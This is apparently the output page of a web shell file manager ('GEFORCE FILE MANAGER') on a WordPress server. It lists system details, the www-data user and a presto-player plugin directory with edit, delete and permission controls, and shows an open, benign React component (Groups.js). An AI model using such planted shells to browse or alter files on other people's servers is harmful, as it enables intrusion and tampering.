[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
src
/
admin
/
settings
/
components
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 CTA.js
600 B
SET
[ EDIT ]
|
[ DEL ]
📄 Disabled.js
861 B
SET
[ EDIT ]
|
[ DEL ]
📄 Group.js
2,021 B
SET
[ EDIT ]
|
[ DEL ]
📄 Groups.js
747 B
SET
[ EDIT ]
|
[ DEL ]
📄 Media.js
1,903 B
SET
[ EDIT ]
|
[ DEL ]
📄 Notices.js
552 B
SET
[ EDIT ]
|
[ DEL ]
📄 Page.js
428 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Groups.js
const { Card, CardBody, CardFooter, Modal, Button } = wp.components; import SaveButton from "./SaveButton"; import Fields from "./Fields"; import Group from "./Group"; export default ({ groups }) => { const showDialog = (group) => { return ( group?.disabled?.title && group?.disabled?.message && group?.disabled?.link ); }; return ( <> {Object.keys(groups).length && Object.keys(groups).map((key) => { if (!Object.keys(groups[key]?.fields || {}).length) { return; } if (groups[key]?.hidden) { return; } const group = groups[key]; return <Group key={key} group={group} name={key} />; })} </> ); };